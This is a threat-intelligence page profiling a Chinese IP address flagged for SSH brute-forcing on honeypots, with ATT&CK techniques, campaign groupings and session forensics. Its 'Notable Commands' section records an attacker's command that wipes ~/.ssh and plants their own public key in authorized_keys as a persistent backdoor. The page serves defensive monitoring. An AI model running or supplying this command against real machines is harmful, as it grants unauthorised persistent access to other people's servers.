IntrusionLabs / threat intelligence

Sign in

← Back to feed

220.250.52.111

TAGGED MALICIOUS how we decide →

Threat Confidence

58%

Location

🇨🇳 CN

ASN

AS4837 · CHINA UNICOM China169 Backbone

Cloud Provider

—

Total Events

25

Average by volume

Agent Count

2

First / Last Seen

2026-06-03 05:24 — 2026-06-03 19:06

Attack Types

ssh:bruteforce

MITRE ATT&CK Techniques

Reconnaissance

T1595 T1595.002

Initial Access

T1078

Defense Evasion

T1070.004

Credential Access

T1110 T1110.001

Discovery

T1046

Command and Control

T1105

External Corroboration

Not flagged by any external feeds

Campaigns

Multi-Agent Scan SCAN Active medium

22 IPs 5243 events

2026-05-28 — ongoing · 22 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

41 IPs 81661 events

2026-05-11 — ongoing · 41 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

40 IPs 101722 events

2026-05-09 — ongoing · 40 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

20 IPs 3889 events

2026-05-08 — ongoing · 20 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on DO. Scanning the same …

Multi-Agent Scan SCAN Active medium

21 IPs 3915 events

2026-05-08 — ongoing · 21 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

24 IPs 53018 events

2026-05-05 — ongoing · 24 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

29 IPs 32419 events

2026-05-03 — ongoing · 29 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

191 IPs 217811 events

2026-05-03 — ongoing · 191 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

191 IPs 218056 events

2026-05-03 — ongoing · 191 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

54 IPs 60019 events

2026-05-03 — ongoing · 54 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

5 IPs 1917 events

2026-05-03 — ongoing · 5 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

43 IPs 62407 events

2026-04-13 — ongoing · 43 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

42 IPs 75293 events

2026-04-02 — ongoing · 42 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

Multi-Agent Scan SCAN Active medium

35 IPs 14918 events

2026-03-27 — ongoing · 35 IPs independently targeted the same honeypot sensors within a 24-hour window. Hosted on Linode. Scanning the same …

Multi-Agent Scan SCAN Active medium

129 IPs 150461 events

2026-02-28 — ongoing · 129 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …

HASSH f555226df196… — SSH-2.0-libssh_0.9.6 (997 IPs, 86 countries) HASSH Active high 🇺🇸 US

997 IPs 432733 events

http:scanssh:bruteforce

2026-02-25 — ongoing · 997 IPs are running an identical SSH client (HASSH fingerprint f555226df196…). Top network: UCLOUD INFORMATION TECHNOLOGY HK LIMITED …

AS4837 CHINA UNICOM China169 Backbone ASN Active medium 🇨🇳 CN

21 IPs 1928 events

mysql:bruteforcessh:bruteforce

2026-02-16 — ongoing · 21 IPs from the same network (CHINA UNICOM China169 Backbone, AS4837) were active during overlapping time periods. Temporal …

Session Forensics

scanner ×1 malware_dropper ×1 credential_probe ×1 opportunistic_bruter ×1

Sessions

4 (2 with login)

Avg Depth Score

0.46

Commands Executed

3

Files Downloaded

1

Notable Commands

cd ~; chattr -ia .ssh; lockr -ia .ssh
lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

Fingerprints

HASSH

f555226df1963d1d3c09daf865abdc9a

SSH Client

SSH-2.0-libssh_0.9.6

Evidence Timeline

Scanner 8aed18cc4571 w4m_singapore_01 · 2026-06-03 19:04

15%

Loading events...

Malware Dropper c87e1bc44115 w4m_seattle_01 · 2026-06-03 05:24

3 1 1 100%

Loading events...

Opportunistic Bruter 1ff0f1b6ac2d w4m_seattle_01 · 2026-06-03 05:24

1 50%

Loading events...

Credential Probe fced8cbab40e w4m_seattle_01 · 2026-06-03 05:24

1 20%

Loading events...